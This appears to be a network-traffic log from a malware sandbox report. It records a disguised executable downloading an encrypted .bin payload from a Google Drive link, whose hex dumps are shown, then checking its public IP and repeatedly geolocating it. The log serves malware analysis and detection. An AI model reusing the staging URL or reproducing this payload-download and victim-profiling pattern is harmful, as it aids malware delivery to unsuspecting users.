                                                                                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 191.96.150.187</body></html>
Oct 7, 2024 10:56:20.348664045 CEST | 127 | OUT | GET / HTTP/1.1
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                                                                        Host: checkip.dyndns.org
Oct 7, 2024 10:56:20.554243088 CEST | 323 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Mon, 07 Oct 2024 08:56:20 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Content-Length: 106
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        X-Request-ID: 7769cc9146b04d9d16e773a16c7bff00
                                                                                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 191.96.150.187</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.11.20 | 49708 | 142.250.80.46 | 443 | 800 | C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-07 08:56:09 UTC | 216 | OUT | GET /uc?export=download&id=1WV9EOTTQfkUmPf_sEzMxkIUTbO_SPJgS HTTP/1.1
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                                                                                                                        Host: drive.google.com
                                                                                                                                                                                                                        Cache-Control: no-cache
2024-10-07 08:56:09 UTC | 1610 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                        Date: Mon, 07 Oct 2024 08:56:09 GMT
                                                                                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=1WV9EOTTQfkUmPf_sEzMxkIUTbO_SPJgS&export=download
                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                        Content-Security-Policy: script-src 'nonce-1srqt_NIum69tHTq6-xusQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.11.20 | 49709 | 142.250.65.225 | 443 | 800 | C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-07 08:56:10 UTC | 258 | OUT | GET /download?id=1WV9EOTTQfkUmPf_sEzMxkIUTbO_SPJgS&export=download HTTP/1.1
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                                                                                        Connection: Keep-Alive
2024-10-07 08:56:12 UTC | 4891 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                        Content-Security-Policy: sandbox
                                                                                                                                                                                                                        Content-Security-Policy: default-src 'none'
                                                                                                                                                                                                                        Content-Security-Policy: frame-ancestors 'none'
                                                                                                                                                                                                                        X-Content-Security-Policy: sandbox
                                                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                        Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                                                                                        Cross-Origin-Resource-Policy: same-site
                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                        Content-Disposition: attachment; filename="mTCNLyZXNMlBC5.bin"
                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                        Access-Control-Allow-Credentials: false
                                                                                                                                                                                                                        Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                        Content-Length: 274496
                                                                                                                                                                                                                        Last-Modified: Tue, 01 Oct 2024 23:17:15 GMT
                                                                                                                                                                                                                        X-GUploader-UploadID: AHmUCY0x-OmIpRQYBk7TKQQIRQ2QCq2C43TMPw_9akwq91bs73PAn8V9ghpTHJW25sdiZBaoaa0
                                                                                                                                                                                                                        Date: Mon, 07 Oct 2024 08:56:12 GMT
                                                                                                                                                                                                                        Expires: Mon, 07 Oct 2024 08:56:12 GMT
                                                                                                                                                                                                                        Cache-Control: private, max-age=0
                                                                                                                                                                                                                        X-Goog-Hash: crc32c=sWFznw==
                                                                                                                                                                                                                        Server: UploadServer
                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Data Ascii: \{@owq1Y0s_wW7VZ,Hb'y}`#N
                                                                                                                                                                                                                        2024-10-07 08:56:12 UTC1255INData Raw: 84 17 db ae 53 87 00 f9 68 69 c0 b9 23 33 8b cc e1 36 b3 c6 df e0 72 51 ea b2 9c 9f 2b 80 cc f1 6f 7e bb 0f c6 48 f7 db 39 4f ad 72 8c c4 59 f5 df ef a2 26 14 d3 e9 62 9f d1 29 fa f1 89 be 86 94 4b 0d 3e 7d f1 e8 fa 7c 1d 06 84 94 0e 5f 4d 00 a6 bd 28 bb 3a 24 da ab 8d 10 4f 5e 55 48 ce 2e b4 12 74 e9 24 6a 9e d0 f5 0a cb 9e 97 35 7f 57 e5 ea a7 c1 1a a9 37 29 fb 02 9e 4f ff 16 38 45 fb e1 eb 00 50 4c 96 23 89 c9 63 ef 05 9b 42 0f 86 4b 81 77 dc 43 77 c2 a0 ff 83 c4 5e c4 fe c5 4a 27 be 2e b1 31 b4 e6 11 63 82 66 3d 73 94 6c 20 65 9b 3d b0 cb cc fb 3c be 94 a3 47 ee 52 07 84 90 10 05 66 a2 25 b6 f7 4f 1b 68 ae eb 67 6d 24 91 36 2d 2a ac 4f 38 31 05 3a 35 d5 a2 84 c2 80 76 ae 3f 6c c2 29 4c 53 17 71 59 ee f3 3a 90 bd 50 4f ea 2b 82 58 2c 2f d7 13 ff 4d fd
                                                                                                                                                                                                                        Data Ascii: Shi#36rQ+o~H9OrY&b)K>}|_M(:$O^UH.t$j5W7)O8EPL#cBKwCw^J'.1cf=sl e=<GRf%Ohgm$6-*O81:5v?l)LSqY:PO+X,/M
                                                                                                                                                                                                                        2024-10-07 08:56:12 UTC1255INData Raw: 9d 1f ef ce 7f 73 1b d2 08 e7 d6 a4 a5 5e f2 b9 3d 9a 43 f3 2a 98 22 53 cb 83 f1 20 3d 5a 91 c2 b6 87 47 36 b5 31 f7 17 19 5f fe 7a 74 97 94 c4 0a a0 cf 4d 0d 5a f9 60 fb 4a 69 90 25 0c 85 c5 6e a3 87 a3 42 2d e1 d5 09 e8 a7 10 29 00 0e 4e 50 71 e9 05 25 60 d8 71 ad 8f c5 b1 e4 31 47 a0 f1 76 63 9e 72 b1 e0 94 37 30 f3 8b d5 cc 2d cc 3a 9a 19 b2 30 59 f3 ed 51 49 ac 59 61 7b 7b 07 cb 43 9f 82 a8 63 c2 42 78 2e b4 55 95 8a 9c c9 44 39 3d 5a 75 b0 66 34 fd e6 96 0c 74 b6 f3 f6 4c fa a9 92 06 5b 56 ff 6c 49 11 a1 5d 37 d3 50 0a 75 26 84 06 5e 62 98 61 9e 6e 40 cc 2d 92 f8 92 2b 9b ab 01 5b a3 78 3d 38 73 7a b6 78 71 6f 77 71 ac a7 27 e9 2f 30 bc 79 9b 7f ca 7b ba fe 3d bd 34 fe d5 fc 58 3a cd 37 ba 57 d7 4d f7 91 98 08 bb a2 23 27 67 f5 14 8f 66 a9 d2 7d e4
                                                                                                                                                                                                                        Data Ascii: s^=C*"S =ZG61_ztMZ`Ji%nB-)NPq%`q1Gvcr70-:0YQIYa{{CcBx.UD9=Zuf4tL[VlI]7Pu&^ban@-+[x=8szxqowq'/0y{=4X:7WM#'gf}
                                                                                                                                                                                                                        2024-10-07 08:56:12 UTC1255INData Raw: 09 74 cd 20 4b c7 6c 35 c9 87 49 48 7e fa 24 11 48 ac 44 7d 64 4d 2d 19 ed 73 39 6f 86 36 26 53 f2 f2 29 69 26 54 8e 8a ed 57 b0 c8 c3 a0 37 2f c1 92 9f 20 d2 6d d4 33 22 c4 78 7b 21 a9 9f 0f b6 e0 e9 10 d9 2d c5 a0 ec f2 48 27 c6 03 23 3b 47 1f 36 cf c5 51 4d f0 e8 1c 19 5e af 47 5f c3 94 21 0b 6b 81 6a 8e 79 3e dd fb c4 e2 49 8f 5b 8d b2 85 47 19 e7 a7 77 e9 6f cc b2 24 d8 d1 25 d9 cc 27 9e 62 f5 7f 93 b8 06 a9 fe 31 9f 24 0d 6e c6 95 2a d5 ac 90 e0 14 56 07 01 b9 ea 04 c2 ed 90 5f 9d 20 ed 72 09 65 b9 ab 0f 69 9e 24 fc 5d d0 3d 54 bb 36 80 57 00 73 e2 8d 0b 98 d6 96 05 a5 af 12 62 ec 63 1a 76 26 36 c6 6e 4b 3d 5a 0c 6a 15 2e fd 05 02 ad 34 ec 97 74 d6 64 e0 cf 29 64 ed 7d 83 f9 91 8b fa 9c 2a 09 db 03 27 e2 d1 99 a0 a6 4a 40 ce 48 9d 65 07 b1 1b 9b e8
                                                                                                                                                                                                                        Data Ascii: t Kl5IH~$HD}dM-s9o6&S)i&TW7/ m3"x{!-H'#;G6QM^G_!kjy>I[Gwo$%'b1$n*V_ rei$]=T6Wsbcv&6nK=Zj.4td)d}*'J@He
                                                                                                                                                                                                                        2024-10-07 08:56:12 UTC1255INData Raw: ab bf 88 e0 37 44 a3 a3 c5 16 02 32 98 2b 70 fe bf 01 55 63 d0 8f ca 7d fb 77 0f a8 e6 62 dc 22 10 39 19 20 5c 72 b4 c7 49 8f 3d 80 2a 79 11 b4 49 e8 3f 8d a0 15 8d fa e4 2b 89 2d c8 63 25 a3 c1 bc b1 8d 1f c8 5a 4b 40 73 ea 61 42 1f 12 2e a6 f2 2a 14 1f 6e 33 00 5e cf 38 d9 42 a1 e6 7a 90 f7 35 7f ee 1e 92 6a 81 bd 3e 0b d0 1e f9 07 4b 62 a1 94 10 58 b4 87 20 70 6e 80 f1 c9 60 40 fa 38 3a 86 46 54 26 42 40 df 6e 32 9d 53 de e9 c6 4f 18 e2 d7 f3 9c 74 14 65 48 8b db bd 5a 7c be d5 f7 df 66 e4 ef 24 2c 91 75 60 0d 0f 82 ac 70 ad 94 c6 eb 7a 7e 1d 39 cc f2 61 f1 e0 95 96 95 0a 6a ce 79 de 44 03 2e 06 57 ee 30 60 24 8e 35 03 86 cd 33 00 c0 04 d3 4a e2 bf 3a 46 96 6a f0 e4 db 78 ce ee be d4 4c 31 c5 69 34 b5 39 2a b8 c1 7b 69 0e f0 f7 46 e0 9c 1a 18 24 bd 8e
                                                                                                                                                                                                                        Data Ascii: 7D2+pUc}wb"9 \rI=*yI?+-c%ZK@saB.*n3^8Bz5j>KbX pn`@8:FT&B@n2SOteHZ|f$,u`pz~9ajyD.W0`$53J:FjxL1i49*{iF$
                                                                                                                                                                                                                        2024-10-07 08:56:12 UTC1255INData Raw: 57 2f 73 eb f2 ab 76 5d 02 f4 73 12 64 90 6e 11 67 89 ad 9d a4 70 f0 8e 64 c9 17 40 b6 3f 0f c7 67 e5 6b eb 88 1b 95 03 d7 14 6e 20 a4 6d 78 88 d8 63 f0 4d d1 03 27 0d 22 2b a7 d6 e5 93 3d 9b a8 47 a3 ae e2 ba ec 93 60 5d 5f b9 0a f0 6a 84 a1 37 a9 f3 6a 07 b3 29 64 52 ce 13 c6 35 49 c4 61 51 a2 aa c4 23 18 f1 88 4b c9 c3 91 6f 58 16 a3 c1 25 94 d4 fc 06 de a1 00 02 2d 0b 9b 6a 34 41 6d 6d b5 57 bc 46 b6 15 60 e9 4d 1a 53 05 ea 96 48 f6 f1 04 8a c2 ca eb fe ba 82 04 eb 12 6f 7f 1e ca 61 d2 96 e7 b9 44 1b 34 b2 ae 3f ea a5 18 94 d0 9e 77 9a c6 ac 17 78 17 9d 0c c0 23 9a 14 5e 58 04 a0 fb 9a 55 7d 2d e9 c6 82 85 93 49 81 fa 47 4c 90 57 2e 86 f2 36 6f dd c5 dc b7 82 43 fc 96 fa b6 07 c4 60 30 a8 57 3f fc e4 c0 7d 0a f8 17 04 b4 99 13 91 31 fe 87 b7 03 59 40
                                                                                                                                                                                                                        Data Ascii: W/sv]sdngpd@?gkn mxcM'"+=G`]_j7j)dR5IaQ#KoX%-j4AmmWF`MSHoaD4?wx#^XU}-IGLW.6oC`0W?}1Y@


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.11.20 | 49711 | 172.67.177.134 | 443 | 800 | C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-07 08:56:15 UTC | 87 | OUT | GET /xml/191.96.150.187 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2024-10-07 08:56:15 UTC | 693 | IN | HTTP/1.1 200 OK
Date: Mon, 07 Oct 2024 08:56:15 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: close
access-control-allow-origin: *
vary: Accept-Encoding
Cache-Control: max-age=86400
CF-Cache-Status: MISS
Last-Modified: Mon, 07 Oct 2024 08:56:15 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BmEEnSyLYlCV6kMJwzOgeMWMwz1KoYPFj3%2BPwRovlBUHKQBdiq0Q6lL6yn3Ca3f13LyRLlZYXPWavQjjlVe0TfzvJxh7GTuMNLaEOUrPYYny9Pv1V3qeLUidp3JnIiPu7IdfAXhM"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8cecad4848ed8cc3-EWR
alt-svc: h3=":443"; ma=86400
2024-10-07 08:56:15 UTC | 369 | IN | Data Ascii: 16a<Response><IP>191.96.150.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>IL</RegionCode><RegionName>Illinois</RegionName><City>Chicago</City><ZipCode>60602</ZipCode><TimeZone>America/Chicago</T
2024-10-07 08:56:15 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.11.20 | 49712 | 172.67.177.134 | 443 | 800 | C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-07 08:56:16 UTC | 63 | OUT | GET /xml/191.96.150.187 HTTP/1.1
Host: reallyfreegeoip.org
2024-10-07 08:56:16 UTC | 684 | IN | HTTP/1.1 200 OK
Date: Mon, 07 Oct 2024 08:56:16 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: close
access-control-allow-origin: *
vary: Accept-Encoding
Cache-Control: max-age=86400
CF-Cache-Status: HIT
Age: 1
Last-Modified: Mon, 07 Oct 2024 08:56:15 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ls4ijhNiOOXRvsiA%2FQiRLeBqHwKkYZq0Qra1kkqs%2Fi%2F%2BhI0jT32eQX480JIampeEVQn2BDiNZ%2FVY1B9T1%2FiApTvuT%2FZevcUrXnHco1YMf%2BikIDCb3dU54n%2BP9Pa0ojrbgSmNKiAv"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8cecad4e9a9d4310-EWR
2024-10-07 08:56:16 UTC | 369 | IN | Data Ascii: 16a<Response><IP>191.96.150.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>IL</RegionCode><RegionName>Illinois</RegionName><City>Chicago</City><ZipCode>60602</ZipCode><TimeZone>America/Chicago</T
2024-10-07 08:56:16 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.11.20 | 49713 | 172.67.177.134 | 443 | 800 | C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-07 08:56:16 UTC | 63 | OUT | GET /xml/191.96.150.187 HTTP/1.1
Host: reallyfreegeoip.org
2024-10-07 08:56:17 UTC | 700 | IN | HTTP/1.1 200 OK
Date: Mon, 07 Oct 2024 08:56:17 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: close
access-control-allow-origin: *
vary: Accept-Encoding
Cache-Control: max-age=86400
CF-Cache-Status: HIT
Age: 2
Last-Modified: Mon, 07 Oct 2024 08:56:15 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2ayF5K6NVTQe2n9qKSbcaHMhmhEv0ktvlg2vhSIYu7KY5sbvbPiNy6UKHCN%2FLoE5WQcolqjt8N8SPohtL9ToMF8nJQa8Rsq7g64XgVgmQwzMx%2B2CHj9J4xicEkorZUh3ho9xmmrP"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8cecad529b6742ca-EWR
alt-svc: h3=":443"; ma=86400
2024-10-07 08:56:17 UTC | 369 | IN | Data Ascii: 16a<Response><IP>191.96.150.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>IL</RegionCode><RegionName>Illinois</RegionName><City>Chicago</City><ZipCode>60602</ZipCode><TimeZone>America/Chicago</T
2024-10-07 08:56:17 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.11.20 | 49714 | 172.67.177.134 | 443 | 800 | C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-07 08:56:17 UTC | 63 | OUT | GET /xml/191.96.150.187 HTTP/1.1
Host: reallyfreegeoip.org
2024-10-07 08:56:17 UTC | 672 | IN | HTTP/1.1 200 OK
Date: Mon, 07 Oct 2024 08:56:17 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: close
access-control-allow-origin: *
vary: Accept-Encoding
Cache-Control: max-age=86400
CF-Cache-Status: HIT
Age: 2
Last-Modified: Mon, 07 Oct 2024 08:56:15 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QWAUxpwK3TxFkXSsKc9Dc6%2FyyBsJJS5s3XnApZsr2oHJNZpwQHbqMLSAtKfEvCOKdTOCOp7Ki7YhiC3WFgtbXF6D7zOHwViTETc4s6gNs8mLfXob1EAIM%2Fx%2FKSqRkN097OOcQHpQ"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8cecad56addf0cb0-EWR
2024-10-07 08:56:17 UTC | 369 | IN | Data Ascii: 16a<Response><IP>191.96.150.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>IL</RegionCode><RegionName>Illinois</RegionName><City>Chicago</City><ZipCode>60602</ZipCode><TimeZone>America/Chicago</T
2024-10-07 08:56:17 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.11.20 | 49715 | 172.67.177.134 | 443 | 800 | C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-07 08:56:18 UTC | 63 | OUT | GET /xml/191.96.150.187 HTTP/1.1
Host: reallyfreegeoip.org
2024-10-07 08:56:18 UTC | 672 | IN | HTTP/1.1 200 OK
Date: Mon, 07 Oct 2024 08:56:18 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: close
access-control-allow-origin: *
vary: Accept-Encoding
Cache-Control: max-age=86400
CF-Cache-Status: HIT
Age: 3
Last-Modified: Mon, 07 Oct 2024 08:56:15 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ntUt7XNtYe6CvfCiD5EGg%2FDcDbjr0Q0B3iFVteZH91hve19U3TUat0PlDlzXE3Etvcb5AwRRp9oiZFX0UzC3i7ENoEiOkCwIjRqjxpWkF1%2FOQsU3ZC5LKSI%2BGHruIJ7HOBEVYqUU"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8cecad5aab7d438a-EWR
2024-10-07 08:56:18 UTC | 369 | IN | Data Ascii: 16a<Response><IP>191.96.150.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>IL</RegionCode><RegionName>Illinois</RegionName><City>Chicago</City><ZipCode>60602</ZipCode><TimeZone>America/Chicago</T
2024-10-07 08:56:18 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.11.20 | 49716 | 172.67.177.134 | 443 | 800 | C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-07 08:56:18 UTC | 63 | OUT | GET /xml/191.96.150.187 HTTP/1.1
Host: reallyfreegeoip.org
2024-10-07 08:56:19 UTC | 678 | IN | HTTP/1.1 200 OK
Date: Mon, 07 Oct 2024 08:56:19 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: close
access-control-allow-origin: *
vary: Accept-Encoding
Cache-Control: max-age=86400
CF-Cache-Status: HIT
Age: 4
Last-Modified: Mon, 07 Oct 2024 08:56:15 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UNo%2Bk5VgMrFnZ1y1Ywn0%2BG0Q%2FtRDgyrw8YdzggwHl28ekLMIsOKZ4Ro6nx%2FYiWCIRWDJsH6UMB3433Okbw8TM3nvtZtPOScAkYB%2Bsk859egYf2n3BV8TcwSP4M%2Fw7m9AMYqbumiW"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8cecad5ebbb9423a-EWR
2024-10-07 08:56:19 UTC | 369 | IN | Data Ascii: 16a<Response><IP>191.96.150.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>IL</RegionCode><RegionName>Illinois</RegionName><City>Chicago</City><ZipCode>60602</ZipCode><TimeZone>America/Chicago</T
2024-10-07 08:56:19 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.11.20 | 49717 | 172.67.177.134 | 443 | 800 | C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-07 08:56:19 UTC | 63 | OUT | GET /xml/191.96.150.187 HTTP/1.1
Host: reallyfreegeoip.org
2024-10-07 08:56:19 UTC | 674 | IN | HTTP/1.1 200 OK
Date: Mon, 07 Oct 2024 08:56:19 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: close
access-control-allow-origin: *
vary: Accept-Encoding
Cache-Control: max-age=86400
CF-Cache-Status: HIT
Age: 4
Last-Modified: Mon, 07 Oct 2024 08:56:15 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GJpD%2B1dbNzF2%2BYVv8X7uPuyqNUJTWhX7WaWcGIdtC%2B5fDOXeHZ7JFRaV0CMuD8e1peTvFR5XvFMqUClAE1TTFc2IahP%2FghnclDS7lY3PK4s1vHd02oh2zFonq5RgG3BGksEDWSLB"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8cecad62c83d0f46-EWR
2024-10-07 08:56:19 UTC | 369 | IN | Data Ascii: 16a<Response><IP>191.96.150.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>IL</RegionCode><RegionName>Illinois</RegionName><City>Chicago</City><ZipCode>60602</ZipCode><TimeZone>America/Chicago</T
2024-10-07 08:56:19 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.11.20 | 49718 | 172.67.177.134 | 443 | 800 | C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-07 08:56:20 UTC | 63 | OUT | GET /xml/191.96.150.187 HTTP/1.1
Host: reallyfreegeoip.org
2024-10-07 08:56:20 UTC | 674 | IN | HTTP/1.1 200 OK
Date: Mon, 07 Oct 2024 08:56:20 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: close
access-control-allow-origin: *
vary: Accept-Encoding
Cache-Control: max-age=86400
CF-Cache-Status: HIT
Age: 5
Last-Modified: Mon, 07 Oct 2024 08:56:15 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PNd9Y4AUqL9J5MZ3t21Dlg%2BWy8knD8P4g3k8D8gXa0QgoJSCXpgCcRn9Tn9BZ4pjPrFCY4Sq6OF2Aoog6sSxobpp%2BgyyTq9kv42KS0exq2OUI2BXccFjsANROj0t3%2Bkkziy9So%2BM"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8cecad66cb148c15-EWR
